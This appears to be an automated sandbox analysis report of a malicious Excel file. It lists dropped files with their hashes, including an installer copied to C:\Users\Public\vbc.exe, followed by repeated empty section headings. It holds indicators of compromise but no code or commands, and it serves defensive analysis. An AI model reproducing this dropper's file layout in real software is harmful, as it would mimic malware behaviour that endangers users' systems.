C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	E8FA2C6354DA839EB77D13EAADE691D2	A269F00CDC1A4CE7CEE50EF3F79BBFCAF08AEE92	A33C62117F575F5828BB8793130BED65F26736BF499FAF31975BD14841F0EF63
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19980AFC.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5319FF63.png	PNG image data, 139 x 180, 8-bit colormap, non-interlaced	E46357D82EBC866EEBDA98FA8F94B385	76C27D89AB2048AE7B56E401DCD1B0449B6DDF05	B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5BA3143E.png	PNG image data, 139 x 180, 8-bit colormap, non-interlaced	E46357D82EBC866EEBDA98FA8F94B385	76C27D89AB2048AE7B56E401DCD1B0449B6DDF05	B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7E91C95F.png	PNG image data, 139 x 180, 8-bit colormap, non-interlaced	5EB99F38CB355D8DAD5E791E2A0C9922	83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA	5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84BE6A08.png	PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced	590B1C3ECA38E4210C19A9BCBAF69F8D	556C229F539D60F1FF434103EC1695C7554EB720	E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\948B366A.png	PNG image data, 139 x 180, 8-bit colormap, non-interlaced	5EB99F38CB355D8DAD5E791E2A0C9922	83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA	5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9B66BB27.png	PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced	590B1C3ECA38E4210C19A9BCBAF69F8D	556C229F539D60F1FF434103EC1695C7554EB720	E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CED38AF1.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	CC200915F9B78F9D1781D12080778A1D	98BA2C43A62881B3219A77948BDE3AC172579610	9273DA8AAC5DB3E186CDE2E6765A0F7526BAE4119197A8A540DBE3CC6CBF73FE
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3B4F6CD.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6B29269.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9A84556.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
C:\Users\user\AppData\Local\Temp\forbrugersamfundet.dat	DOS executable (COM)	BA74ECA2786AF6BA57EA46334F6ED993	5CB090166D6B3A95005ED4ACA47971DC7AB3D4B6	A7BC01059C953A68A5BDE46EB78DFECA83B07F92155704CB0C69E487B9D2F196
C:\Users\user\AppData\Local\Temp\gamer.txt	ASCII text, with very long lines, with no line terminators	AE40B5E7A7212FFC800C72E58AC36057	40326E32BCB3A3DDA3E51E515932D5BEB9C3D6A2	FBE7C025517E6443E0B0BB6486E35A548F82BA5594BC9A0D44D088114D9A8173
C:\Users\user\AppData\Local\Temp\nsj734E.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	CFF85C549D536F651D4FB8387F1976F2	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
C:\Users\user\AppData\Local\Temp\~DF4BE3E1CBE08654A7.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFBA4CF9152A1E9E13.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFD3BE83FE1AD51971.TMP	CDFV2 Encrypted	4AAE6390327810B9CB4055320EA85C31	AEC6F3BFEBE0E92C2D9D16C2FC50E7AB06349A8A	7830F70D3C66EBDB8BCD854C46EFD02C4689FD952F0F701029B14C2C37EE1BC0
C:\Users\user\AppData\Local\Temp\~DFEB9B29E3F948747D.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\Desktop\~$listing new.xlsx	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	E8FA2C6354DA839EB77D13EAADE691D2	A269F00CDC1A4CE7CEE50EF3F79BBFCAF08AEE92	A33C62117F575F5828BB8793130BED65F26736BF499FAF31975BD14841F0EF63

Windows Analysis Report
listing new.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report listing new.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
listing new.xlsx